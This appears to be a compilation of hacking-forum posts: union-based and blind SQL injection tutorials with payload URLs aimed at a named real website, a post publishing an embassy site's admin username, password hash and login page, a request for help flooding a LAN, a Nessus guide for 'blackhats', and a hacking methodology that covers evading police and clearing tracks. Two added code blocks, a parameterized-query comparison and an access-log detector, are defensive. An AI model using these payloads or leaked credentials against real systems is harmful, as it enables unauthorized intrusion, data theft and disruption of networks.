To do it we need to replace "@@version" with "table_name", add "from information_schema.tables" after the last column number, and add the "--" at the end.
Link should be like that:

http://www.leadacidbatteryinfo.org/newsd...php?id=-10
union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

Page should look like that
[Image: tablenames.jpg]

Now we will search for the table we want to access.
We should find something with admin in it, and in our case it's tbladmin.
Now we need to get the ASCII value of "tbladmin".
What is ASCII?
Now to get the ASCII value of "tbladmin" go to that site: http://getyourwebsitehere.com/jswb/text_to_ascii.html


Now enter in the first box the table name, which is "tbladmin" in our case, and click convert to ASCII.
You will get as value that:
Code:
&#116;&#98;&#108;&#97;&#100;&#109;&#105;&#110;
Now remove the characters & # ; and add a comma "," between each number.
It should be like that:
Code:
116,98,108,97,100,109,105,110


Now we replace in the URL "table_name" with "column_name", change "information_schema.tables" to "information_schema.columns", and add "where table_name=char(ASCII value)--".
In our case, in place of (ASCII value) we put (116,98,108,97,100,109,105,110)--
Our URL should look like that :

http://www.leadacidbatteryinfo.org/newsd...php?id=-10
union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--

Our page should be like that:
[Image: columnsm.jpg]

Now we search for the columns named "username" and "password" or something like that.
In our case it is "username" and "password".
Now we can delete most of the URL.
Remove everything after the 11 and add "from tbladmin", and replace "column_name" with "concat(username,0x3a,password)".
0x3a is the ASCII value of a ":" so we can separate the username from the password.
Our URL should look like that:
http://www.leadacidbatteryinfo.org/newsd...php?id=-10
union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin

Our page should look like that :


And you're done: the username is ishir and the password ishir123.
Sometimes the password is encrypted with hashes.
Use my HASH detector to know what it is and decrypt online.
http://adf.ly/cjpJ <---- the password is in it somewhere :)
And we're done!

I hope you liked my tutorial .
ALL credits go to me !
Thanks for reading that thread.
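The "Admin" plus ' or '1'='1 bypass in PART 1 only works because the login page builds its query by string concatenation. As an added example that is not part of the tutorial above, the following Python/sqlite3 code puts that vulnerable query beside a parameterized one; the table name tbladmin, its columns and its single row are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the tutorial's admin table.
    Table name, columns and the single row are assumptions for this example."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tbladmin (username TEXT, password TEXT)")
    db.execute("INSERT INTO tbladmin VALUES ('admin', 'correct-horse')")
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """Builds the WHERE clause by string concatenation, so the quote in the
    submitted password ends the string literal and the rest becomes SQL:
    ... AND password='' or '1'='1'  -> true for every row."""
    sql = ("SELECT username FROM tbladmin WHERE username='" + username
           + "' AND password='" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    """Binds the submitted values as parameters; the driver never lets them
    change the statement, so the same payload is compared as plain text."""
    sql = "SELECT username FROM tbladmin WHERE username=? AND password=?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"  # the first entry of the tutorial's list
    print("concatenated :", login_vulnerable(db, "Admin", payload))     # admin
    print("parameterized:", login_parameterized(db, "Admin", payload))  # None
```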

Indian Embassy Of Kathmandu, Nepal Hacked By Ghosts


Indian Embassy Of Kathmandu, Nepal Hacked By Ghosts (A Black Hat Team). They hacked into the database of the website and exposed sensitive information like admin details and many more.

Website:-
http://www.indianembassy.org.np/


user_name:- indianembassy
password:- 147f9d55b079a76d6ec6f36b61f4cf1a
full_name:- Administrator

Login Link:-
http://www.indianembassy.org.np/admin/login.php

Ambassador Name:- Jayant Prasad
Amb_id:- 21
Last Modification:- 2011-08-27

Creating Broadcast storms to take down a switched Network?

I am willing to take down a LAN network with broadcast storms.

Before that, here is the topology of our overall network.

Please have a look at the following image, which represents the network set-up I am talking about:

Code:

http://i54.tinypic.com/a32fzn.png
(As the image is large, I am placing this in code instead of [IMG] tags)

And here is the information about our LAN:

Total sub-nets: 4

Clients: 90% of them running Windows XP SP2 and the rest running Windows 7 and Vista.

Servers: each sub-net has a DC, i.e. server; they are running Windows 2003 OS.

Main server, i.e. the one that is providing internet access to the rest of the clients and other servers in sub-nets 1, 2, 3, 4: running Red Hat Linux.

And the switches used in our networks are un-managed ones, and our network does not have any kind of NIDS, HIDS, NIPS, HIPS or any kind of network security set-up.

Traffic or accessing PCs across sub-nets is allowed by the domain controller.

And LAN or Ethernet speed in a single sub-net is 100 Mbps.

I am having access to one of the PCs in sub-net 1 and I have privilege to install applications, and I am willing to create some kind of broadcast storms to bring down all the sub-nets. I don't know how much traffic I need to generate to take down this network. Also I am not sure about the right protocols and exact attacking vector to choose. I heard about ARP broadcast storms, but I am not sure about generating ARP broadcasts across sub-nets. Also I am not sure about the switch type, because it is kind of old and it is an un-managed one with no IP address for it.

So looking for some ideas and help, hope I will find some help...

Raise again and again until lambs become Lion..

Never give up !!!!


Scanning with Nessus

[-- Intro --]

Welcome to the Nessus scanning quick guide. In this guide I'll show you
blackhats how to use Tenable Nessus to scan websites // IP's for
vulnerabilities. For this guide I'll be using http://sugarmegs.org/



[-- Installing Nessus --]

For this tutorial I'll be using a Windows 7 machine, instead of my
normal Linux, because the free version works a lot better on Windows.
Now to the actual installing part. Step one, obtaining Nessus. To
download Nessus, visit http://www.nessus.org/download/ and download it. Then install it like you'd install any other program.



[-- Setting up --]

Now to set up your Nessus server. Open the Nessus Server Manager that
should be on your desktop (if it's not, look in C:\Program
Files\Tenable\Nessus for it).

Once you have that open, update your plugins. If "Allow remote users to
connect to this Nessus server" is unchecked, check it. Now hit the
"Manage users" button. Click the + symbol, fill in the Username and
Password, and make it Administrator. Now just save that user, close
that dialog box and start the Nessus server (this may take a couple of
seconds).



[-- Logging in --]

Now to log into the Nessus interface. Just click on the Nessus Client on
your desktop, or go to https://localhost:8834/ (this should be the
default).

Now log in with your new credentials for that new user you added. You should end up on that Nessus interface.



[-- Adding a policy --]

A policy will be used to scan the target with plugins used by Nessus.
Click the policy tab and add a new one. Click safe checks box to make
sure your scan doesn't DoS or harm the target in any way, then click
next. Fill in any optional info you may need in this window such as
credentials, and select next. The next box is for the plugins. I prefer
to add all, but you can sift through them to choose any you want. Next,
type a username and password for database settings, and click submit.
Congrats, you've made a policy for scanning.



[-- Scanning --]

Now to actually scan the target for vulnerabilities. Go to your desktop
and make a new text document, and add the IP of the site. The IP for
SugarMegs is 69.38.143.62. Just add the IP and save the file. Now go to
the scans tab and hit Add. Type any name in the Name field. I'm just
gonna make it "Sugar". For Type, hit run now. Policy is gonna be your
new policy you've made. Hit browse for the IP file and navigate to that
text document, and hit upload. Now, just hit launch scan and let it run.
I recommend going to the reports tab and double clicking your current
scan to see how it's going.



[-- Now what? --]



Once you're done scanning, you can exploit it. Double click on the scan
and hit "Download Report". In the dropdown box, you can select a few
things. For an HTML detailed report, hit Detailed HTML report (by
finding). If you want to add it to Metasploit to autopwn it, save it as
.nessus

Enjoy your scanning ;)

-----------------------

Mini Password Buffer Overflow Tut

Password Form Buffer Overflows

  • In this lesson we will be learning how to do a Login/Password Form Buffer Overflow. This is a very basic version of a Buffer Overflow but just as effective. Basically what is happening here is that password forms usually have a limit on the number of characters they are allowed as input, but we will bypass this limit, overloading the login and getting access to the server!
  • To do this we will need a tool called WebDeveloper for Firefox, which you can download here.
  • This is a very simple hack so it only works on some Basic Authentication logins, but it's good to know for the future if you find any! So in Firefox go to Tools > Web Developer > Forms > Remove Maximum Lengths. Now type in a massively long code, e.g. "aaaaaaaaaaaaaaaaaaaaaaaaa" and so on, and it should come up with an error page either showing the encrypted passwords or the clear text passwords on the server!


Congratulations now you know a simple Form Buffer Overflow!

This tutorial is Written 100% by Lethalcode

Blind SQL Injections ★★★

Step 1 Finding Vulnerabilities



Well, as you know from my first tutorial, a vulnerable website has security holes. Therefore we will take this test website:


Code:

site.com/index.php?id=1


To find out if it's vulnerable we will undergo a little test.

For that we will add some strings. As everybody knows the number 1 is equal to 1. But not to 2.

Therefore we will compare these two websites:


Code:

site.com/index.php?id=1 and 1=1

and

site.com/index.php?id=1 and 1=2


If "and 1=1" loads perfectly, but "1=2" is missing some content, the website is vulnerable.

However, if they both load without missing content, it is not vulnerable.



Step 2 Finding The Mysql Version



This isn't of much use in this kind of injection, but it might be useful.

To find it out, you'll have to 'guess' the version.

It's either 4 or 5.

To find it out do this:


Code:

site.com/index.php?id=1 and substring(@@version,1,1)=5

or

site.com/index.php?id=1 and substring(@@version,1,1)=4
If one of them is loading without missing any content, it's that version.

(You can do the same with the database name and user)



Step 3 Guessing The Table Names.



As you can see, guessing is important in blind SQLi. That's also needed for the table and its columns :p

To get the right table you'll have to guess it this way:

Quote:site.com/index.php?id=1 and (select 1 from insert table here limit 0,1)=1
Insert your guessed table in the underlined part. If the website is loading without content missing, then the table exists.



Suppose we've got this:


Code:

site.com/index.php?id=1 and (select 1 from admin limit 0,1)=1


Step 4 Guessing The Columns In A Table.



We will now guess the columns in this certain table (example = admin).



Do this:

Quote:site.com/index.php?id=1 and (select substring(concat(1,guessed column),1,1) from table limit 0,1)=1


This is an example:


Code:

site.com/index.php?id=1 and (select substring(concat(1,username),1,1) from admin limit 0,1)=1


Suppose we've found a username and a password column in the table admin.



Step 5 Extracting Information From The Columns



Note: You can do the same with some tools.

But I prefer to do it manually.



For this we have to put the syntax in ASCII and guess its char.

Note that each time you'll do this, you'll get 1 letter.



Do this:

Quote:site.com/index.php?id=1 and ascii(substring((select concat(column 1,0x3a,column 2) from table limit 0,1),1,1))>char number


Suppose that we've guessed 70. The website then loads normally. That means that the number must be higher.

Keep guessing until the website will load with some content missing.

So that means the first number that would load false after a number that would load true, is the right char.



Suppose that it's 85.



The example would be:


Code:

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 0,1),1,1))>85


To get the first letter of username:password you'll have to use an ASCII table.

Here is one: http://www.asciitable.com/index/asciifull.gif

Navigate to the found char (which is "dec" in the ascii table) and lookup the "chr".



That means that the char from the example (85) is the capital letter U.



To find the 2nd letter and higher you will have to change the underlined number in the syntax:

Quote:site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 1,1),1,1))>(char)

change to

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 2,1),1,1))>(char)

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 3,1),1,1))>(char)



etc.


You'll notice when you'll get to the end when (number),1 isn't giving any information anymore.



Suppose we've now found that the username:password = UserAdmin:BagelJuice



--



Outro



Thank you very much for reading this tutorial. If there are any
questions, or you feel like I forgot something, please don't hesitate to
post it here.

Also please report any grammatical errors, as I try to dodge them.



I hope I helped you with this thread
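The posts above (the proc/self/environ injection through the User-Agent header, the union-based queries against information_schema, and the blind "and 1=1" / "substring(@@version...)" / "ascii(substring(...))" probes) all leave their payload in the request line or User-Agent of an ordinary web server access log. The following Python scanner, added here and not part of any of the posts, parses Apache combined-format lines and tags the ones matching those patterns; the sample log lines, addresses, timestamps and User-Agent strings are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Apache combined log format (the banner quoted in the LFI post is an Apache
# one). Fields: ip ident user [ts] "method path proto" status size
# "referer" "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Rules applied to the URL-decoded, lower-cased request path. Decoding first
# matters: the same probe arrives as "%20", "+" or a literal space.
PATH_RULES = {
    "lfi_proc_environ": re.compile(r"(\.\./)+.*proc/self/environ"),
    "sqli_order_by_probe": re.compile(r"\border\s+by\s+\d+\s*--"),
    "sqli_union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "sqli_information_schema": re.compile(r"information_schema\.(tables|columns)"),
    "blind_sqli_boolean": re.compile(r"\band\s+\d+\s*=\s*\d+\b"),
    "blind_sqli_version": re.compile(r"substring\s*\(\s*@@version"),
    "blind_sqli_ascii": re.compile(r"ascii\s*\(\s*substring\s*\("),
}
# Applied to the raw User-Agent header: a PHP open tag has no business there,
# whatever follows it.
UA_RULES = {"php_tag_in_user_agent": re.compile(r"<\?")}


def scan_line(line):
    """Parse one combined-format line; return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = unquote_plus(m.group("path")).lower()
    hits = [name for name, rx in PATH_RULES.items() if rx.search(path)]
    hits += [name for name, rx in UA_RULES.items() if rx.search(m.group("ua"))]
    return {"ip": m.group("ip"), "path": m.group("path"), "hits": hits}


def scan_log(lines):
    """Return entries that matched at least one rule, tagged with line numbers."""
    findings = []
    for n, line in enumerate(lines, 1):
        entry = scan_line(line)
        if entry and entry["hits"]:
            entry["line"] = n
            findings.append(entry)
    return findings


# Constructed sample log: the request paths follow the posts above, but the
# addresses, timestamps and User-Agent values are made up for this example.
UA = '"Mozilla/5.0 (constructed)"'
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2011:13:55:36 +0000] "GET /view.php?page=../../../../../proc/self/environ HTTP/1.1" 200 5123 "-" "<?php /* constructed */ ?>"',
    '203.0.113.7 - - [10/Oct/2011:13:56:02 +0000] "GET /newsdetail.php?id=10%20order%20by%2015-- HTTP/1.1" 500 221 "-" ' + UA,
    '203.0.113.7 - - [10/Oct/2011:13:56:40 +0000] "GET /newsdetail.php?id=-10%20union%20all%20select%201,2,3,4,5,6,7,table_name,9,10,11%20from%20information_schema.tables-- HTTP/1.1" 200 8841 "-" ' + UA,
    '198.51.100.9 - - [10/Oct/2011:14:01:11 +0000] "GET /index.php?id=1+and+1=2 HTTP/1.1" 200 3020 "-" ' + UA,
    '198.51.100.9 - - [10/Oct/2011:14:01:19 +0000] "GET /index.php?id=1+and+substring(@@version,1,1)=5 HTTP/1.1" 200 4110 "-" ' + UA,
    '198.51.100.9 - - [10/Oct/2011:14:02:05 +0000] "GET /index.php?id=1+and+ascii(substring((select+1),1,1))>85 HTTP/1.1" 200 4110 "-" ' + UA,
    '192.0.2.44 - - [10/Oct/2011:14:03:00 +0000] "GET /newsdetail.php?id=10 HTTP/1.1" 200 4110 "http://www.example.com/" ' + UA,
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['ip']} {', '.join(f['hits'])}")
```

A single hit is a probe, not proof of compromise; the blind probes in particular only matter when the same client repeats them many times, so counting hits per source address over a window is the next step.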

Hacking - Start to finish (quick list)

Hello, this little post will explain in rough details how you start hacking a specific target.

First. There are many different ways of going about this, but this is one way.

Information gathering
The first thing you want to do when targeting a specific target is get as much information as possible before a front attack (if any; being quiet is much better).
Now this step can take ages if you really want a detailed level of knowledge. And if you are serious about hacking your target, you should be detailed here.
What sort of information do I look for, you might ask yourself? Well, anything really. Anything surrounding the target and even things that surround things that surround your target. Here is a short list of things that might be useful;
  • IP(s), some machines/domains/systems or whatever have multiple domains
  • ISP(s), if small ISP(s), get owner details here as below
  • Owner. Email, name, location, family, hobbies, Facebook account, phone number
  • *Open ports. On ALL of the ips/servers if there are multiple
  • Service signatures, find out as much as possible about all the open ports, are they in use? What software are they running at the other end? Do the services reveal any other information about the system? OS? Internal IPS?
  • Hosters(In most cases there will be a hosting company)
  • Hosters information - Owner and all of that(If the company is small)
  • Hoster's member system, how do the members log in? Is there a login? Is there a forgot password function? Can you exploit the hoster instead? (might be easier in some cases)
  • DNS records(if any), subdomains? Hidden domains/info? DNS hosters? Same as above.
  • The physical server(s) location / datacenter
And the list goes on and on and on. Literally EVERYTHING about the company/system/server/target is relevant. The more info you've got, the easier it will be attacking him/her/them/it. You should decide if you want to target the system or the people of your target. That is, code/system flaws or human flaws (keyloggers, Trojans, social engineering, info gathering + password guessing, etc). This decision should depend on the information you find about your target. Both can be tried of course, just make sure the target does not know you are trying to hack it; often one of the attempts will set off alerts. This whole information gathering part might seem unnecessary, but really, it's neat; it lets you put things in perspective so you can find the best point of entry.

The attack
Before an attack is launched, there are a few things you need to think about. Here is a list of things you should think about;
  • Will this company/target rage crazy if I hack them? If so, check the 3rd point.
  • Will police or other agencies be contacted if I hack them? If so, check the 3rd point.
  • *Is my privacy good enough? Are you behind a proxy (or proxies)? Should you? Does the proxy log? (It shouldn't)
  • Are they running any services at all? If not, you don't really have any virtual way in..
  • Are they running web applications? These are typically easier to hack than services, and have a higher percentage rate of flaws.
  • Does the target have an open router/switch/modem system? This often happens with home computers/networks.
  • Is your target running platforms with logins? These could be targeted.
  • Do you have enough time? It's good practice to have enough time to do the entire attack in one go. Else you might fire off warnings for the target, and he can go into a bomb shelter. We don't want that now, do we?

Now there are three ways of attacking in this guide.
- Service/software exploitation
- Web application exploitation
- Human factor exploitation


Service/software exploitation
Here you will exploit one or more services/programs running on the target system. In most cases, this will be called buffer overflow. This can do everything from bypassing a login to giving you instant shell access. In scenarios where the target is running services which are not a web server (can be though) this might be the way to go.

Web application exploitation
This is without a doubt the most vulnerable field. Web applications are flawful; 70% or so of all pages have some sort of web application flaw, and this ofc may vary from a stupid XSS to a serious RFI. In scenarios where the target system is running a web server, this is the first thing to check. Do always check web applications before going on to service exploitation if you just want to get the target hacked.

Human factor exploitation
Now if all other things fail, there is ALWAYS a human factor. This can be social engineering the target to give you limited access, and you work your way up from there. Or simply tricking the target to trust you and in some strange way share his password, perhaps not for the system you are targeting, but for his email or an online account or whatever; stupid people tend to use the same password or the same password syntax everywhere. Keep in mind that the human factor doesn't necessarily have to be your target's owner; it could be the hoster, the DNS hoster, the ISP, family.


Final note
If you think it's necessary, clear your tracks. If you ask me, if you can see that you have been there you didn't do it right. Take care, be safe.

-----------------------
